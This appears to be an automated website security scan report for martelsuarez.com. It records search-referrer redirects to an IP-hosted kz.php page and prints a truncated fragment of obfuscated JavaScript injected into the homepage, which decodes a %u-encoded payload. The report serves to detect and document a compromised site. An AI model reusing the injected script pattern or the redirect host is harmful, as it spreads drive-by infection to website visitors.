Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://martelsuarez.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: martelsuarez.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 14 Sep 2014 17:24:24 GMT Location: http://77.78.239.18/kz.php?sa=04 Server: Apache Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://martelsuarez.com/ | 200 OK Content-Length: 9964 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function jIxnUrxy(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(jIxnUrxy()>100000){window.name=3884595755666519495547423784526814254729275736776229961339682363787169177551228741637751728945214929;var rVwKZEnt='%u0032%u000e%u0067%u0001%u0073%u0012%u007f%u001a%u003a%u004d%u0024%u0040%u0034%u005c%u0061%u0050%u0070%u0018%u007d%u0014%u007 ...[702 bytes skipped]... Antivirus reports:
| ||
http://martelsuarez.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 14 Sep 2014 17:24:25 GMT Location: http://77.78.239.18/kz.php?sa=04 Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://77.78.239.18/kz.php?sa=04 | 500 Can't connect to 77.78.239.18:80 (Ð Ñоединении оÑказано) Content-Length: 206 Content-Type: text/plain | clean |
http://77.78.239.18/test404page.js | 500 Can't connect to 77.78.239.18:80 (Ð Ñоединении оÑказано) Content-Length: 206 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=martelsuarez.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://martelsuarez.com/
Result: martelsuarez.com is not infected or malware details are not published yet.
Result: martelsuarez.com is not infected or malware details are not published yet.